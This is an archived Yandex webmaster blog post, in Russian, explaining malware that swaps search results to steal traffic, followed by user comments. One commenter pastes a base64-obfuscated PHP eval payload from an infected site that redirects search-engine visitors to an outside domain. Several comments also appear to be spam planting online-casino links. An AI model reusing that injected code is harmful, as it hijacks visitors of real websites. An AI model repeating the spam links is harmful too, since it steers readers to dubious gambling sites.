Блог Яндекса для вебмастеров

Вирус подмены страниц

Пост в архиве.

В последнее время в Рунете появилось вредоносное программное обеспечение нового типа – программы, созданные для искажения страниц в браузере пользователя. Поскольку нас интересует поиск, мы рассмотрим деятельность этих программ в контексте поисковых систем.

В строгом понимании термина «вирус» эти программы вирусами не являются, однако механизм их работы очень похож на деятельность вирусов, поэтому условимся называть такое ПО «вирусом подмены страниц». При обращении пользователя, компьютер которого заражен таким вирусом, к поисковой системе вирус изменяет один из результатов поиска. Таким образом, пользователь переходит не на сайт, найденный поисковой системой, а на какой-то другой.

Эта проблема существует для всех популярных в Рунете поисковиков – для Яндекса, Google, Рамблера, MSN (Live). Кроме того, вирус может подменять не только страницы с результатами поиска, а вообще любые сайты.

Вирус подмены страниц может попасть на компьютер вместе с какой-нибудь программой, загруженной из интернета. Например, вместе с бесплатным ускорителем закачки файлов BitAccelerator, который предоставляется файлообменным сервисом Letitbit.net. Вместе с этой программой пользователь скачивает скрытую библиотеку. Эта библиотека остается на компьютере пользователя и при удалении BitAccelerator.

Чаще всего на зараженном компьютере вирус ведет себя одним из двух способов:

  • Вирус подменяет html-код страницы с результатами поиска, подставляя вместо одного из результатов ссылку и описание другого сайта. Дизайн и общий вид подмененной позиции похожи на обычные результаты поиска, но сам сайт к заданному запросу отношения не имеет. Например, по запросу [самолет] выводится порносайт, или по запросу [Яндекс] – сайт другой компании. Если задать тот же самый запрос еще раз, нерелевантный сайт исчезнет из результатов поиска.
  • Другой вариант появился позднее, возможно, вследствие того, что пользователи меньше кликали по нерелевантным ответам. По запросу пользователя страница выдачи не изменяется, но при переходе по одному из первых результатов поиска вирус переадресовывает пользователя на другой сайт.

Вирус подмены страниц используется для воровства и продажи трафика – с его помощью можно получить, по самым скромным оценкам, несколько сот тысяч переходов в день. Переходы пользователей продаются рекламодателям как контекстная реклама.

Схема работы мошенников выглядит следующим образом:

  • Рекламодатель заказывает рекламу сайта по определенным ключевым словам. Эти слова передаются в программу, работающую на удаленном сервере злоумышленников.
  • Когда пользователь заходит с зараженного компьютера на сайт какой-нибудь поисковой системы и вводит запрос в строке поиска, вирус активизируется и передает запрос на сервер мошенников. Если этот запрос содержится в программе, в ответ приходит адрес сайта, который подставляется в выдачу поисковика.
  • Пользователь переходит по ложной ссылке и уходит, решив, что поисковая система дала ему нерелевантный ответ. При этом вирус модифицирует HTTP-запрос таким образом, что в логи посещенного сайта записывается переход с рекламной сети мошенников – поэтому рекламодатель заплатит за этот переход.

В результате проигрывают все – кроме авторов вируса, конечно. Пользователь не находит нужную информацию. Рекламодатель платит за нецелевой трафик. Поисковая система теряет репутацию – обнаружив последствия работы вируса подмены, некоторые пользователи обвиняют поисковики в продаже мест на первых страницах выдачи.

До недавнего времени антивирусные компании классифицировали вирусы подмены страниц просто как рекламный софт – не особо полезный, но вроде бы и не вредный. В результате совместных с нами обсуждений и исследований большинство антивирусных компаний пришло к выводу, что такие программы представляют несомненную угрозу. Сейчас большинство производителей антивирусов перевели вирусы подмены страниц в класс вредоносного и опасного ПО. Антивирусы компаний Dr.Web, «Лаборатория Касперского», ESET (NOD32), Panda Security обнаруживают и автоматически удаляют все известные версии вируса подмены страниц.

Кроме того, можно избавиться от вируса при помощи утилиты Касперского или CureIt от "Доктора Веба". 

Мы рассчитываем на то, что вместе с антивирусными компаниями нам удастся остановить распространение вируса и появление его новых образцов.

Если вы подозреваете, что ваш компьютер заражен вирусом подмены страниц, пишите по адресу – safesearch@yandex-team.ru. Мы обязательно поможем.

Александр Садовский

57 комментариев
а на Макоси такое может быть?
Теоретически — да. Поэтому лучше не запускать программы из ненадежных источников.
"А знаете ли вы, что..." :) ...BitAccelerator никакой не "ускоритель закачки", он всего лишь добавляет в запрос заголовок с ключом, без которого Letitbit просто не позволяет качать файлы. ...если по запросу контекстного объявления не найдено, то подставляется ссылка на rbc.ru (или просто в Магне наплодили объявлений для РБК по всем средне- и высокочастотникам).
ВладимирГП
19 января 2016, 11:47
Все верно, РБК видимо теряет свои позиции как финансовый аналитик с уважаемым мнением, поэтому за нехилые бабки скупает весь мусор у Яндекса и тем самым засоряя поисковую выдачу. Надо Яндексу отказать РБК в этой услуге, и ьтогда Яндекс будет чистый и пушистый и стоить его акции будут более дорого
Опять РБК мутит?
Ну наконец-то дело сдвинулось с мёртвой точки! Приятно осознавать, что я к этому тоже приложил немало усилий.. :) Ещё бы производителей вирусов найти...
Black Seo в действии
Проблема такая действительно имеет место быть, но под приведенное выше описание попадает и надстройка для браузера seoquake, поскольку она меняет страницу с выдачей, добавляя к ней строчку рекламы и параметры сайтов в серпе. С ней антивирусники и Яндекс тоже будут бороться?
Если seoquake будет незаметно устанавливаться без ведома пользователя, то, подозреваю, что будут и с ней бороться -)
Покупатель
19 января 2016, 11:47
Это ответ крупного бизнеса на агрессивную политику Яндекса к SEO. Если не выходит купить позиции с помощью ссылок, покупают пользователей оптом. Жесть. :((( Эдак Яндекс всех пользователей растеряет...
Покупатель
19 января 2016, 11:47
Пользуясь случаем хочу пожаловаться на службу webmaster.yandex.ru/delspam.xml Несколько писем на протяжении 5 месяцев про сайты содержащие спам, оставлены без внимания. Рамблер среагировал мгновенно. Возьмите меня на работу начальником этой службы. Обещаю навести порядок.
Вот это контрудар по сеошникам.... Мораль не фиг скачивать с левых сайтов проги халявные
Как мягко и ненавязчиво предложили "Я.Онлайн с антивирусом Касперского"... Или только у меня такое ощущение возникло?
да, беспалево
Так, а приведенный BitAcellerator и является вирусом? Просто недавно добавил его в доверенную зону, не думал что такой сервис может вирус подсунуть... Частенько приходится скачивать с него файлы
поменьше порнухи смотреть надо или качать её из торрентов..и все будет ок...
у меня сейчас тот самый вирус :( не могу курсовик сделать, никакой поисковик не работает. только апорт :(
Да, было дело. Странно, что Яндекс так долго реагировал - первый случай мне известен чуть ли не в декабре. Один из компов отправлял на РБК.ру. Лечилось чисткой куков и временных файлов. Свежайшие на тот момент NOD32, CureIt (DrWeb), онлайн - Касперский ничего не нашли.
Здравствуйте! писала в службу поддержки ответа пока нет а вопрос очень срочный! У меня проблема, мне пришло письмо на мой эл ящик shurshalka0@ya.ru из службы поддержки Яндекса, в котором была информация о том что на меня поступила какая то жалоба, я не придала должного значения этому письму и мой ящик заблокировали, ответ на контрольный вопрос я не помню. Все бы ничего, да только я со своего аккаунта веду рекламные кампании на Яндекс.Директ. И на моем эл кошельке лежат деньги, соответственно доступ и туда мне закрыт. Помогите мне пожалуйста решить эту проблему. жду ответа на этот ящик mamapapa4@ya.ru
Алексей Лифарь
19 января 2016, 11:47
Заразил своего ослика этой заразой, с поисковиков (ya, google) перекидывает на "Твой Поиск" (каталог)... Антивир лень скачивать, поэтому поставил свежую мозилу.... юзаю 2 недели, проблем нету, а щас только щас узнал как от вируса избавиться... ) но смысла по большому счету уже нету... все равно комп надо выкидывать )
У меня тоже было такое. Например ищешь сайт Библиотека программиста, а тебя перебрасывает на rbc.ru из результатов поиска. Ищешь Портал для вебмастеров и опять тоже самое. Но проблема решается просто. Открываем поиск файлов, ищем ConnectionServices.dll и удаляем все найденные экземпляры.
у меня повысились приходы с Яндекса может случайное совпадение?
Спасибо, поняла... Было дело, сейчас нет... Наверно, антивирусная программа излечила... Но почему у меня сбивается в выключенном ПК время? Первый раз такое за 20 лет...
может батарейка села на маме, которая отвечает за сохранность настроек биоса, вот батарейка не работает и не помнит у тебя биос сколько времени...
Большое спасибо за совет и внимание!
АхЭТА,
А я скачал свой сайт https://replay-fortuna.site/ и заархивировал, после чего почистил NOD'ом и софтинкой CureIt - помогло ;)
У меня подобное безобразие: Каждые 10 минут при открытом браузере Firefox открывается страница с порносайтом или онлайн-казино (англоязычные). В других браузерах такого не наблюдается. Переустановка браузера не помогла. При обновлении версии браузера проблема не решается. Mozilla Firefox 3.0.8 -> Mozilla Firefox 3.0.9 -> Mozilla Firefox 3.0.10 Антивирусная проверка ESET, DrWeb, Avira, AVZ не выявили проблем. :(
Любовь Бушуева
15 ноября 2017, 20:19
Anodonta,
править файл хост

Anodonta,
 у меня на моем сайте http://play-fortuna.fun/ была такая же проблема. Вопрос решился удалением в коде левого javascript.
Александр
19 января 2016, 11:47

Да причем тут почта, мне подменяют Яндекс на хто знает что (но потом оказывается в нижней строчке, никогда не угадаете,) - mail.ru >:-)

вирус, который активируется 27 числа, подхватил такой, заразил многие файлы 

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciw2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

при прямом заходе - нормально всё, при переходе через поисковик - перекидывает на http://minkof.sellclassics.com/ уже 3й раз заражаю им сайты, не знаю что делать. Скорее всего дело в кукисах оперы (в ней сижу) , т.к. фтп пароли не сохраняю. Версия сайтов - Joomla 1.5.xx

Смотрю тема аж с 2008 года, а она все еще актуально. Купил себе на днях новый ноут. Начал устанавливать все необходимое. И вот дошел до необходимой мне Filezilla. Набираю в поисковике, а меня выкидывает на какой-то сайт, очень похожий на официальный. Но сомнения берут верх. Перепроверяю все. Даже в википедии набрал. Там статья есть про Filezilla, в ней ссылка на официальный сайт. Прохожу и опять на тот же подозрительный сайт. Ну думаю ладно, значит так должно быть. Скачиваю, устанавливаю, и вуаля, хватаю вирус на новый комп. По всей видимости уже второй, т.к. уже был направлен на эту страничку первым вирусом. Слава богу ноут новый совсем и на нем почти ничего не было. Вылечил возвратом к заводским установкам. Естественно все, что до этого установил, включая обновление до Windows 8.1, похерилось. Теперь все по новой. 

К слову. С рабочего компа пробую найти FileZilla и все нормуль. Даже не могу найти тот сайт, на который выкидывало новый ноут. 

 

 

 

vikt-bondarev,
я вижу проблема у многих такая. 12 лет прошло, а она все равно встречается. Вы скинули код в base64 зашифрованном формате, браузер при рендеринге страницы его расшифровывает и там уже вредоносный код. Так что заранее сложно его отследить. У меня на сайте https://playfortuna.com/ru была такая же проблема, долго не могли понять в чем дело. В итоге просканировали весь код на наличие base64.

Смотрю тема аж с 2008 года, а она все еще актуально. Купил себе на днях новый ноут. Начал устанавливать все необходимое. И вот дошел до необходимой мне Filezilla. Набираю в поисковике, а меня выкидывает на какой-то сайт, очень похожий на официальный. Но сомнения берут верх. Перепроверяю все. Даже в википедии набрал. Там статья есть про Filezilla, в ней ссылка на официальный сайт. Прохожу и опять на тот же подозрительный сайт. Ну думаю ладно, значит так должно быть. Скачиваю, устанавливаю, и вуаля, хватаю вирус на новый комп. По всей видимости уже второй, т.к. уже был направлен на эту страничку первым вирусом. Слава богу ноут новый совсем и на нем почти ничего не было. Вылечил возвратом к заводским установкам. Естественно все, что до этого установил, включая обновление до Windows 8.1, похерилось. Теперь все по новой.

К слову. С рабочего компа пробую найти FileZilla и все нормуль. Даже не могу найти тот сайт, на который выкидывало новый ноут.

Весьма познавательно. Даже и не знал...:-)

У меня другая проблема, этот вирус подмены работает как на телефоне, так и компьюторе, что немного неувязывается. Набираю слова "Самые быстрые автомобили" выдает сайт "CRAZY SPEED", но отсылает на различные сайты. Это получается компьютер и телефон заражен одновременно или что то другое? 
Любое действие в поисковиках приводит меня на Мэйл ру.
Даже если кликнуть увелисчить картинку и вуая! Я на странице на Мэйл ру!
Как с этим бороться ?
Дайте ответ пожалуйста! У меня на любом сайте при поиске по сайту перекидует мой запрос на яндекс, а на главной странице открывается ya.ru. Утилита от Доктор Веб ничего не находит, в настройка гугл везде стоит гугл яндекса нет, а в Настройках поисковой системы все тоже удалено, перепробовал много чего, все равно ничего не решает эту проблему. Помогите! Не могу искать ничего на других сайтах
Оралова Валентина.
20 сентября 2016, 15:40
У меня зависает страница Однокласники при просмотре стоит только крутнуть колясико на  мышке и зависает.
Не могу скачать. Я.Онлайн -пишут "нет страницы" Curelt- не можем осуществить безопасное соединение.
Помогите пожалуйста, набираю в Яндексе ответы все в Рамблере.
А я в google искал youtube и при нажатии на самую верхнюю ссылку там где реклама меня перекидывало на левые сайты на которых прадлагали установить всякие расширения для Chrome. При смене IP всё стало работать нормально и пока не перекидывает на другие сайты. Переадресация идёт сначала сюда, а потом ещё несколько переадресаций и кидает на разные сайты.
http://mototrackteamplate.com/1-2/?url=http://youtube.com&id=5
 Возможно вирус у провайдера?
Обновлено 17 апреля 2017, 16:30
Елена Першина
Сотрудник Яндекса17 апреля 2017, 21:40
Vitaliy,
Причины могут быть разные, по одному описанию не установить. Можно пожаловаться на эту рекламу и попросить её перепроверить. Если подмена идёт на стороне сайта, её обязательно найдут.
Елена Першина,
Сегодня уже нет той рекламы youtube который не всегда youtube. Просто привык на верхние ссылки жать, а там такая шляпа! Наверное нужно будет снова поставить блокировку рекламы, а то мало ли - вдруг опять такое будет :)
Я не знаю, что это за форум и так далее, но начинается сайт на yandex.ru. Значит так. Чтобы сегодня же у меня нигде не появлялось ваше уведомление о наличии какого-то там рекламного вируса. Моё терпение чтобы нажимать на крестик и убрать это уведомление на исходе!
Удалённый пользователь
5 июля 2017, 10:50
А DNS сервер тут непричём...
Удалённый пользователь
5 июля 2017, 10:59
Возможно вирус - это подобия коррекции обработки персональных данных между пользователями.
Но вот реклама - это действительно помеха. Так как пользователь компьютера платит провайдеру за доступ к данным, а не навязыванию ему какой-либо информации. Даже если рекламная информация создана по статистике, так как статистика может быть фальшивой.
Лол я в шоке Яндекс описывает собственный вирус
Елена Першина
Сотрудник Яндекса12 февраля 2018, 10:29
fidelityst,
Вы правда не понимаете, как описанная штука работает? 
У меня на планшете так
Максим Уральских
22 декабря 2018, 20:07
А если просто  ищу YouTube нажимаю на ссылку и та вкладка где был запрос Вкладка сменилась на сайт YouTuba это решимо, если да, то как?
Елена Першина
Сотрудник Яндекса24 декабря 2018, 14:27
Максим Уральских,
 добрый день! Из описания не очень ясна суть проблемы, можете более подробно её описать и отправить это описание в нашу поддержку?  
Роман Нестеренко
27 февраля 2019, 16:36
Хотя бы написали способ как избавиться вручную, а то антивирус местами ничего не видит, хоть какой!
При нажатии на любую ссылку на странице яндекс (не важно - погода, новости, даже в почте) перенаправляет на яндекс еда.  Достало! 
Иван Кулев
2 мая 2019, 20:09
Latty W.,
Решился вопрос?
Здравствуйте! Увидела вашу статью  про вирус подмены страниц. Видимо именно этот вирус у меня. Уже более года не знаю, что с ним делать! Злит очень! Проверяю ноут периодически через утилиту CureIt от "Доктора Веба". Но она не распознает этот вирус. Подскажите пожалуйста, что делать??
Такое впечатление,что вирус подобный в самой поисковой системе яндекса.